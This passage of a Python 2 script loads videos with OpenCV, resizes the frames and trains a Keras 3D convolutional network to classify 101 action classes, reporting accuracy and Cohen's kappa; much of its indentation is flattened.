framesR3 = []
cap = cv2.VideoCapture(vid)
fps = cap.get(5)
#print "Frames per second using video.get(cv2.cv.CV_CAP_PROP_FPS): {0}".format(fps)
#test
frame = []
ret, frame = cap.read()
#print frame.shape
if frame is None:
                print "image not readable"
                continue # skip this unreadable video instead of abandoning the rest of the class
count = 0
kondisi = True
while kondisi == True:
ret, frame = cap.read()
if frame is None:
print "skipping vid"
break
count += 1
frameR1 = cv2.resize(frame, (R1x, R1y), interpolation=cv2.INTER_AREA)
framesR1.append(frameR1)
frameR2 = cv2.resize(frame, (R2x, R2y), interpolation=cv2.INTER_AREA)
framesR2.append(frameR2)
frameR3 = cv2.resize(frame, (R3x, R3y), interpolation=cv2.INTER_AREA)
framesR3.append(frameR3)
#plt.imshow(gray, cmap = plt.get_cmap('gray'))
#plt.xticks([]), plt.yticks([]) # to hide tick values on X and Y axis
#plt.show()
#cv2.imshow('frame',gray)
                if count == RDepth: # stop once the clip holds exactly RDepth frames, matching the pre-allocated arrays below
kondisi = False
if cv2.waitKey(1) & 0xFF == ord('q'):
break
count_test += 1
label = labelIdx-1
labels_test.append(label)
cap.release()
cv2.destroyAllWindows()
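            # stack the captured frames into one clip array per resolution and add it to the test set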
inputR1=np.array(framesR1)
inputR2=np.array(framesR2)
inputR3=np.array(framesR3)
#print input.shape
iptR1=inputR1
iptR2=inputR2
iptR3=inputR3
#print ipt.shape
X_test_R1.append(iptR1)
X_test_R2.append(iptR2)
X_test_R3.append(iptR3)
listing = os.listdir('TrainData/' + getLabelFromIdx(labelIdx) + '/')
for vid in listing:
vid = 'TrainData/' + getLabelFromIdx(labelIdx) + '/' +vid
framesR1 = []
framesR2 = []
framesR3 = []
cap = cv2.VideoCapture(vid)
fps = cap.get(5)
#print "Frames per second using video.get(cv2.cv.CV_CAP_PROP_FPS): {0}".format(fps)
#test
frame = []
ret, frame = cap.read()
#print frame.shape
if frame is None:
                print "image not readable"
                continue # skip this unreadable video instead of abandoning the rest of the class
count = 0
kondisi = True
while kondisi == True:
ret, frame = cap.read()
if frame is None:
print "skipping vid"
break
count += 1
frameR1 = cv2.resize(frame, (R1x, R1y), interpolation=cv2.INTER_AREA)
framesR1.append(frameR1)
frameR2 = cv2.resize(frame, (R2x, R2y), interpolation=cv2.INTER_AREA)
framesR2.append(frameR2)
frameR3 = cv2.resize(frame, (R3x, R3y), interpolation=cv2.INTER_AREA)
framesR3.append(frameR3)
#plt.imshow(gray, cmap = plt.get_cmap('gray'))
#plt.xticks([]), plt.yticks([]) # to hide tick values on X and Y axis
#plt.show()
#cv2.imshow('frame',gray)
                if count == RDepth: # stop once the clip holds exactly RDepth frames, matching the pre-allocated arrays below
kondisi = False
if cv2.waitKey(1) & 0xFF == ord('q'):
break
            count_train += 1
            labels_train.append(labelIdx - 1)
cap.release()
cv2.destroyAllWindows()
inputR1=np.array(framesR1)
inputR2=np.array(framesR2)
inputR3=np.array(framesR3)
#print input.shape
iptR1=inputR1
iptR2=inputR2
iptR3=inputR3
#print ipt.shape
X_train_R1.append(iptR1)
X_train_R2.append(iptR2)
X_train_R3.append(iptR3)
# formatting data
X_train_R1_array = (X_train_R1)
X_train_R2_array = (X_train_R2)
X_train_R3_array = (X_train_R3)
labels_train_array = np.array(labels_train)
    Y_train = np_utils.to_categorical(labels_train_array, 101) # one-hot encode over the 101 classes
X_test_R1_array = (X_test_R1)
X_test_R2_array = (X_test_R2)
X_test_R3_array = (X_test_R3)
labels_test_array = np.array(labels_test)
    Y_test = np_utils.to_categorical(labels_test_array, 101) # one-hot encode over the 101 classes
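    # pre-allocate fixed-size clip tensors of shape (samples, frames, height, width, channels) for each resolution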
test_set_R1 = np.zeros((count_test, RDepth, R1y,R1x,3))
test_set_R2 = np.zeros((count_test, RDepth, R2y,R2x,3))
test_set_R3 = np.zeros((count_test, RDepth, R3y,R3x,3))
for h in xrange(count_test):
test_set_R1[h][:][:][:][:]=X_test_R1_array[h]
test_set_R2[h][:][:][:][:]=X_test_R2_array[h]
test_set_R3[h][:][:][:][:]=X_test_R3_array[h]
train_set_R1 = np.zeros((count_train, RDepth, R1y,R1x,3))
train_set_R2 = np.zeros((count_train, RDepth, R2y,R2x,3))
train_set_R3 = np.zeros((count_train, RDepth, R3y,R3x,3))
for h in xrange(count_train):
train_set_R1[h][:][:][:][:]=X_train_R1_array[h]
train_set_R2[h][:][:][:][:]=X_train_R2_array[h]
train_set_R3[h][:][:][:][:]=X_train_R3_array[h]
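    # scale pixel values from [0, 255] to [-1, 1] before feeding them to the network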
train_set_R1 = train_set_R1.astype('float32')
train_set_R1 -= 127.5
train_set_R1 /=127.5
train_set_R2 = train_set_R2.astype('float32')
train_set_R2 -= 127.5
train_set_R2 /=127.5
train_set_R3 = train_set_R3.astype('float32')
train_set_R3 -= 127.5
train_set_R3 /=127.5
test_set_R1 = test_set_R1.astype('float32')
test_set_R1 -= 127.5
test_set_R1 /=127.5
test_set_R2 = test_set_R2.astype('float32')
test_set_R2 -= 127.5
test_set_R2 /=127.5
test_set_R3 = test_set_R3.astype('float32')
test_set_R3 -= 127.5
test_set_R3 /=127.5
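    # the commented-out block below is an alternative two-branch (merged) model definition that is not used in this run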
#%% define a model
# # Parameter tuning
# jumEpoch = 25
# nb_classes = 8
# #Branch A
# filterNumL1 = 16 # number of L1 filters
# filterSizeXYL1 = 5 # filter size in the spatial dimensions
# filterSizeTL1 = 3 # filter size in the temporal dimension
#
# poolingSizeXYL1 = 3
# poolingSizeTL1 = 1
# poolingStrideXYL1 = 1
# poolingStrideTL1 = 1 # L1 pooling parameters
# #Branch B
# filterNumL1B = 32 # number of L1 filters
# filterSizeXYL1B = 3 # filter size in the spatial dimensions
# filterSizeTL1B = 3 # filter size in the temporal dimension
#
# poolingSizeXYL1B = 3
# poolingSizeTL1B = 1
# poolingStrideXYL1B = 1
# poolingStrideTL1B = 1 # L1 pooling parameters
# Define model
# modelA = Sequential()
# modelA.add(Convolution3D(filterNumL1,kernel_dim1=filterSizeXYL1, kernel_dim2=filterSizeXYL1, kernel_dim3=filterSizeTL1, input_shape=(10, 20, 30, 3), activation='relu', dim_ordering='tf'))
# modelA.add(MaxPooling3D(pool_size=(poolingSizeXYL1, poolingSizeXYL1, poolingSizeTL1), dim_ordering='tf'))
# modelA.add(SpatialDropout3D(0.4))
# modelA.add(Flatten())
#
# modelB = Sequential()
# modelB.add(Convolution3D(filterNumL1B,kernel_dim1=filterSizeXYL1B, kernel_dim2=filterSizeXYL1B, kernel_dim3=filterSizeTL1B, input_shape=(10, 20, 30, 3), activation='relu', dim_ordering='tf'))
# modelB.add(MaxPooling3D(pool_size=(poolingSizeXYL1B, poolingSizeXYL1B, poolingSizeTL1B), dim_ordering='tf'))
# modelB.add(SpatialDropout3D(0.4))
# modelB.add(Flatten())
#
#
# model = Sequential()
# model.add(Merge([modelA, modelB], mode='concat'))
# model.add(Dense(paramuji, init='normal', activation='relu'))
#
# model.add(Dropout(0.4))
#
# model.add(Dense(nb_classes,init='normal'))
#
# model.add(Activation('softmax'))
# model.summary()
# model.compile(loss='categorical_crossentropy', optimizer='RMSprop', metrics = ["accuracy"])
#
#
# # Train the model
#
# hist = model.fit([train_set, train_set], Y_train, validation_data=([test_set, test_set], Y_test),
# batch_size=15, nb_epoch = jumEpoch, show_accuracy=True, shuffle=True, verbose = 0)
#
# # Evaluate the model
# score = model.evaluate([test_set, test_set], Y_test, batch_size=15, show_accuracy=True)
#
# Define model
# Parameter tuning
jumEpoch = 50
nb_classes = 101
    filterNumL1 = 32 # number of filters in the first convolutional layer
    filterSizeXYL1 = 9 # filter size in the spatial dimensions
    filterSizeTL1 = 5 # filter size in the temporal dimension
    poolingSizeXYL1 = 2
    poolingSizeTL1 = 2
    poolingStrideXYL1 = 1
    poolingStrideTL1 = 1 # pooling parameters for the first block
    filterNumL2 = 64 # number of filters in the second convolutional layer
    filterSizeXYL2 = 7 # filter size in the spatial dimensions
    filterSizeTL2 = 5 # filter size in the temporal dimension
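    # the active model: a single-stream 3D CNN with three Conv3D + MaxPooling3D + SpatialDropout3D blocks, followed by fully connected layers and a softmax over the 101 classes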
model = Sequential()
model.add(Convolution3D(filterNumL1,kernel_dim1=filterSizeTL1, kernel_dim2=filterSizeXYL1, kernel_dim3=filterSizeXYL1, input_shape=(RDepth, R1y, R1x,3), activation='relu', dim_ordering='tf'))
#model.add(BatchNormalization(epsilon=0.001, axis=-1, momentum=0.99, weights=None, beta_init='zero', gamma_init='one', gamma_regularizer=None, beta_regularizer=None))
model.add(MaxPooling3D(pool_size=(poolingSizeXYL1, poolingSizeXYL1, poolingSizeTL1), dim_ordering='tf'))
model.add(SpatialDropout3D(0.3))
model.add(Convolution3D(filterNumL2,kernel_dim1=filterSizeTL2, kernel_dim2=filterSizeXYL2, kernel_dim3=filterSizeXYL2, activation='relu', dim_ordering='tf'))
#model.add(BatchNormalization(epsilon=0.001, axis=-1, momentum=0.99, weights=None, beta_init='zero', gamma_init='one', gamma_regularizer=None, beta_regularizer=None))
model.add(MaxPooling3D(pool_size=(poolingSizeXYL1, poolingSizeXYL1, poolingSizeTL1), dim_ordering='tf'))
model.add(SpatialDropout3D(0.3))
model.add(Convolution3D(filterNumL2,kernel_dim1=3, kernel_dim2=5, kernel_dim3=5, activation='relu', dim_ordering='tf'))
#model.add(BatchNormalization(epsilon=0.001, axis=-1, momentum=0.99, weights=None, beta_init='zero', gamma_init='one', gamma_regularizer=None, beta_regularizer=None))
model.add(MaxPooling3D(pool_size=(poolingSizeXYL1, poolingSizeXYL1, poolingSizeTL1), dim_ordering='tf'))
model.add(SpatialDropout3D(0.3))
model.add(Flatten())
model.add(Dense(256, init='normal', activation='relu'))
model.add(BatchNormalization(epsilon=0.001, axis=-1, momentum=0.99, weights=None, beta_init='zero', gamma_init='one', gamma_regularizer=None, beta_regularizer=None))
model.add(Dropout(0.5))
model.add(Dense(64, init='normal', activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(nb_classes,init='normal'))
model.add(Activation('softmax'))
model.summary()
model.compile(loss='categorical_crossentropy', optimizer='Adam', metrics = ['acc'])
# Train the model
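    # a ModelCheckpoint callback keeps the weights of the epoch with the best validation accuracy; those weights are reloaded before evaluation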
    nama_filenya = "weights_" + vartuning + ".hdf5" # checkpoint file for this run (there is no cross-validation fold index in this script)
checkpointer = ModelCheckpoint(filepath=nama_filenya, monitor='val_acc', verbose=1, save_best_only=True, save_weights_only=True)
hist = model.fit(train_set_R1, Y_train, validation_data=(test_set_R1, Y_test),
batch_size=8, nb_epoch = jumEpoch, shuffle=True, verbose = 1, callbacks = [checkpointer])
# Evaluate the model
# load best model
model.load_weights(nama_filenya)
score = model.evaluate(test_set_R1, Y_test, batch_size=8)
    print "Model score:"
print score[1]
Y_pred = model.predict_classes(test_set_R1, batch_size = 8)
    grup.append(1) # single fixed train/test split, so the block index is constant
grup.append(score[1])
cohennya = cohen_kappa_score(np.argmax(Y_test,axis=1), Y_pred)
    print "Cohen kappa:"
print cohennya
grup.append(cohennya)
writer.writerows([grup])
| 35.868421 | 213 | 0.56335 |